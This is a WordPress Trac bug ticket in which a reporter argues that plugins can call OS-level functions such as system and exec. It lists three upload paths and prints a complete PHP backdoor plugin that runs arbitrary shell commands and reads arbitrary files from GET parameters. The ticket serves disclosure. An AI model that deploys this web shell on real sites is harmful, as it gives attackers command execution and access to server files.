[wp-trac] [WordPress Trac] #44826: system calls through php are not prevented

WordPress Trac noreply at wordpress.org
Tue Aug 21 11:33:28 UTC 2018 

#44826: system calls through php are not prevented
----------------------------+-----------------------------
 Reporter:  danielsvartman  |      Owner:  (none)
     Type:  defect (bug)    |     Status:  new
 Priority:  normal          |  Milestone:  Awaiting Review
Component:  General         |    Version:  4.9.8
 Severity:  major           |   Keywords:
  Focuses:                  |
----------------------------+-----------------------------
 Hi, I know this may be a repetitive thing for you, but seems that you
 don't check within plugins whether the shell_exec, exec, system, popen or
 passthru functions are used. Attackers usually leverage them to gain
 access to the OS, which is mostly sealed and unreachable from developers.

 Do you mind telling me where do you stand about it? I found three
 different paths to exploit this:
 1) Through the wp-content/upgrade folder, after uploading a non-working
 plugin on purpse
 2) By uploading a regular php file instead of a zip as a plugin. This will
 leave the file under the /wp-content/uploads folder without deleting it
 3) as a valid plugin (of course).

 The plugin I wrote below allows me to run multiple kind of commands at the
 OS level, to retrieve multiple kind of data:

 {{{#!php
 <?php

 /*
 Plugin Name: My Crazy Backdoor Plugin!
 */

 switch ($_GET['action']){;

         case "CMD":
                 system($_GET['value']);
                 break;
         case "FILE_READ":
                 $lines = file($_GET['value']);
                 foreach ($lines as $line_num => $line) {
                 echo "Line #<b>{$line_num}</b> : " .
 htmlspecialchars($line) . "<br />\n";
                 }
                 break;
         case "INFO":
                 echo phpinfo();
                 break;
         }
 ?>

 }}}

 I did report this to hackerone as well, but they just disregarded my
 finding and closed the bug, alleging that's how wordpress works. I think
 they didn't even pay enough attention to the bug (sites like 000webhost,
 x10hosting, wordpress itself, among others, allowed me to upload custom
 plugins that will interact with the OS, even if I'm not authorized to do
 it).

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/44826>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform

More information about the wp-trac mailing list